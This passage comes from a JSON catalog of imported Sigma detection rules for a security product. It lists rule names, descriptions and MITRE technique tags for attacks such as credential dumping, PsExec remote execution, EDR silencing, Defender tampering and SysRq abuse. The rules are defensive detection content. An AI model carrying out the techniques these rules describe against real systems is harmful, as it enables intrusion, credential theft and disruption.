"provenance": { "source": "SigmaHQ/sigma", "source_id": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_vssaudit_secevent_source_registration.yml" } }, { "id": "sigmahq-sigma-ea011323-7045-460b-b2d7-0f7442ea6b38", "type": "detection", "name": "Potential PsExec Remote Execution", "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1587.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-psexec-remote-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ea011323-7045-460b-b2d7-0f7442ea6b38", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml" } }, { "id": "sigmahq-sigma-ea0cdc3e-2239-4f26-a947-4e8f8224e464", "type": "detection", "name": "Suspicious File Encoded To Base64 Via Certutil.EXE", "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64 where the extensions of the file is suspicious", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-encoded-to-base64-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ea0cdc3e-2239-4f26-a947-4e8f8224e464", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml" } }, { "id": "sigmahq-sigma-ea34fb97-e2c4-4afb-810f-785e4459b194", "type": "detection", "name": "Curl Usage on Linux", "description": "Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/curl-usage-on-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ea34fb97-e2c4-4afb-810f-785e4459b194", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_curl_usage.yml" } }, { "id": "sigmahq-sigma-ea3ecad2-db86-4a89-ad0b-132a10d2db55", "type": "detection", "name": "Interactive Bash Suspicious Children", "description": "Detects suspicious interactive bash as a parent to rather uncommon child processes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.004", "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/interactive-bash-suspicious-children.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ea3ecad2-db86-4a89-ad0b-132a10d2db55", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml" } }, { "id": "sigmahq-sigma-ea5c131b-380d-49f9-aeb3-920694da4d4b", "type": "detection", "name": "Suspicious Unsigned Thor Scanner Execution", "description": "Detects loading and execution of an unsigned thor scanner binary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/suspicious-unsigned-thor-scanner-execution.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ea5c131b-380d-49f9-aeb3-920694da4d4b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_thor_unsigned_execution.yml" } }, { "id": "sigmahq-sigma-ea61bb82-a5e0-42e6-8537-91d29500f1b9", "type": "detection", "name": "Potential Abuse of Linux Magic System Request Key", "description": "Detects the potential abuse of the Linux Magic SysRq (System Request) key by adversaries with root or sufficient privileges\nto silently manipulate or destabilize a system. By writing to /proc/sysrq-trigger, they can crash the system, kill processes,\nor disrupt forensic analysis\u2014all while bypassing standard logging. Though intended for recovery and debugging, SysRq can be\nmisused as a stealthy post-exploitation tool. It is controlled via /proc/sys/kernel/sysrq or permanently through /etc/sysctl.conf.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.004", "T1529", "T1489", "T1499" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-abuse-of-linux-magic-system-request-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ea61bb82-a5e0-42e6-8537-91d29500f1b9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/path/lnx_auditd_magic_system_request_key.yml" } }, { "id": "sigmahq-sigma-ea9bf0fa-edec-4fb8-8b78-b119f2528186", "type": "detection", "name": "Windows Defender AMSI Trigger Detected", "description": "Detects triggering of AMSI by Windows Defender.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-defender-amsi-trigger-detected.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_malware_detected_amsi_source.yml" } }, { "id": "sigmahq-sigma-eaa9ac35-1730-441f-9587-25767bde99d7", "type": "detection", "name": "Github Outside Collaborator Detected", "description": "Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.001", "T1098.003", "T1213.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-outside-collaborator-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eaa9ac35-1730-441f-9587-25767bde99d7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_outside_collaborator_detected.yml" } }, { "id": "sigmahq-sigma-eae8c0c8-e5da-450a-9d7d-66aa56cd26b6", "type": "detection", "name": "OpenCanary - NMAP FIN Scan", "description": "Detects instances where an OpenCanary node has been targeted by a NMAP FIN Scan", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-nmap-fin-scan.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eae8c0c8-e5da-450a-9d7d-66aa56cd26b6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_portscan_nmap_fin_scan.yml" } }, { "id": "sigmahq-sigma-eae8ce9f-bde9-47a6-8e79-f20d18419910", "type": "detection", "name": "Suspicious History File Operations - Linux", "description": "Detects commandline operations on shell history files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-history-file-operations-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eae8ce9f-bde9-47a6-8e79-f20d18419910", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_susp_histfile_operations.yml" } }, { "id": "sigmahq-sigma-eafe6f2b-cfec-4612-aec2-49563c33a087", "type": "detection", "name": "Google Workspace Government Attack Warning", "description": "Detects a login attempt in Google Workspace flagged as a potential attack by a government-backed threat actor", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-workspace-government-attack-warning.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eafe6f2b-cfec-4612-aec2-49563c33a087", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/gworkspace/login/gcp_gworkspace_govattack.yml" } }, { "id": "sigmahq-sigma-eb1c4225-1c23-4241-8dd4-051389fde4ce", "type": "detection", "name": "Suspicious DumpMinitool Execution", "description": "Detects suspicious ways to use the \"DumpMinitool.exe\" binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-dumpminitool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml" } }, { "id": "sigmahq-sigma-eb2d07d4-49cb-4523-801a-da002df36602", "type": "detection", "name": "HackTool - EDRSilencer Execution", "description": "Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-edrsilencer-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eb2d07d4-49cb-4523-801a-da002df36602", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_edrsilencer.yml" } }, { "id": "sigmahq-sigma-eb2fd349-ec67-4caa-9143-d79c7fb34441", "type": "detection", "name": "Suspicious GPO Discovery With Get-GPO", "description": "Detect use of Get-GPO to get one GPO or all the GPOs in a domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1615" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-gpo-discovery-with-get-gpo.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eb2fd349-ec67-4caa-9143-d79c7fb34441", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml" } }, { "id": "sigmahq-sigma-eb6c2004-1cef-427f-8885-9042974e5eb6", "type": "detection", "name": "Suspicious Network Communication With IPFS", "description": "Detects connections to interplanetary file system (IPFS) containing a user's email address which mirrors behaviours observed in recent phishing campaigns leveraging IPFS to host credential harvesting webpages.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1056" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-network-communication-with-ipfs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eb6c2004-1cef-427f-8885-9042974e5eb6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_susp_ipfs_cred_harvest.yml" } }, { "id": "sigmahq-sigma-ebbeb024-5b1d-4e16-9c0c-917f86c708a7", "type": "detection", "name": "User Added to an Administrator's Azure AD Role", "description": "User Added to an Administrator's Azure AD Role", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-added-to-an-administrator-s-azure-ad-role.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ebbeb024-5b1d-4e16-9c0c-917f86c708a7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_ad_user_added_to_admin_role.yml" } }, { "id": "sigmahq-sigma-ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", "type": "detection", "name": "Invoke-Obfuscation Via Use Clip - PowerShell Module", "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-clip-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml" } }, { "id": "sigmahq-sigma-ebea773c-a8f1-42ad-a856-00cb221966e8", "type": "detection", "name": "DLL Sideloading by VMware Xfer Utility", "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dll-sideloading-by-vmware-xfer-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ebea773c-a8f1-42ad-a856-00cb221966e8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml" } }, { "id": "sigmahq-sigma-ebef4391-1a81-4761-a40a-1db446c0e625", "type": "detection", "name": "New ActiveScriptEventConsumer Created Via Wmic.EXE", "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-activescripteventconsumer-created-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ebef4391-1a81-4761-a40a-1db446c0e625", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml" } }, { "id": "sigmahq-sigma-ebfe73c2-5bc9-4ed9-aaa8-8b54b2b4777d", "type": "detection", "name": "MSSQL Server Failed Logon From External Network", "description": "Detects failed logon attempts from clients with external network IP to an MSSQL server. This can be a sign of a bruteforce attack.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mssql-server-failed-logon-from-external-network.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ebfe73c2-5bc9-4ed9-aaa8-8b54b2b4777d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml" } }, { "id": "sigmahq-sigma-ec0722a3-eb5c-4a56-8ab2-bf6f20708592", "type": "detection", "name": "Renamed Gpg.EXE Execution", "description": "Detects the execution of a renamed \"gpg.exe\". Often used by ransomware and loaders to decrypt/encrypt data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-gpg-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ec0722a3-eb5c-4a56-8ab2-bf6f20708592", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_gpg4win.yml" } }, { "id": "sigmahq-sigma-ec127035-a636-4b9a-8555-0efd4e59f316", "type": "detection", "name": "Clipboard Collection with Xclip Tool", "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1115" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/clipboard-collection-with-xclip-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ec127035-a636-4b9a-8555-0efd4e59f316", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml" } }, { "id": "sigmahq-sigma-ec19ebab-72dc-40e1-9728-4c0b805d722c", "type": "detection", "name": "Tamper Windows Defender - PSClassic", "description": "Attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/tamper-windows-defender-psclassic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_tamper_windows_defender_set_mp.yml" } }, { "id": "sigmahq-sigma-ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", "type": "detection", "name": "WMI Persistence - Script Event Consumer", "description": "Detects WMI script event consumers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmi-persistence-script-event-consumer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml" } }, { "id": "sigmahq-sigma-ec290c06-9b6b-4338-8b6b-095c0f284f10", "type": "detection", "name": "Suspicious Execution of Shutdown to Log Out", "description": "Detects the rare use of the command line tool shutdown to logoff a user", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1529" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-execution-of-shutdown-to-log-out.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ec290c06-9b6b-4338-8b6b-095c0f284f10", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_shutdown_logoff.yml" } }, { "id": "sigmahq-sigma-ec52985a-d024-41e3-8ff6-14169039a0b3", "type": "detection", "name": "Mount Execution With Hidepid Parameter", "description": "Detects execution of the \"mount\" command with \"hidepid\" parameter to make invisible processes to other users from the system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mount-execution-with-hidepid-parameter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ec52985a-d024-41e3-8ff6-14169039a0b3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml" } }, { "id": "sigmahq-sigma-ec541962-c05a-4420-b9ea-84de072d18f4", "type": "detection", "name": "New AWS Lambda Function URL Configuration Created", "description": "Detects when a user creates a Lambda function URL configuration, which could be used to expose the function to the internet and potentially allow unauthorized access to the function's IAM role for AWS API calls.\nThis could give an adversary access to the privileges associated with the Lambda service role that is attached to that function.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-aws-lambda-function-url-configuration-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ec541962-c05a-4420-b9ea-84de072d18f4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_lambda_function_url.yml" } }, { "id": "sigmahq-sigma-ec570e53-4c76-45a9-804d-dc3f355ff7a7", "type": "detection", "name": "7Zip Compressing Dump Files", "description": "Detects execution of 7z in order to compress a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/7zip-compressing-dump-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml" } }, { "id": "sigmahq-sigma-ec82e2a5-81ea-4211-a1f8-37a0286df2c2", "type": "detection", "name": "Suspicious DNS Query for IP Lookup Service APIs", "description": "Detects DNS queries for IP lookup services such as \"api.ipify.org\" originating from a non browser process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1590" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-dns-query-for-ip-lookup-service-apis.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_susp_external_ip_lookup.yml" } }, { "id": "sigmahq-sigma-ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", "type": "detection", "name": "Persistence Via TypedPaths - CommandLine", "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/persistence-via-typedpaths-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_typed_paths_persistence.yml" } }, { "id": "sigmahq-sigma-ec8c4047-fad9-416a-8c81-0f479353d7f6", "type": "detection", "name": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", "version": "1.0.0", "author": "AiSOC", "tags": [ 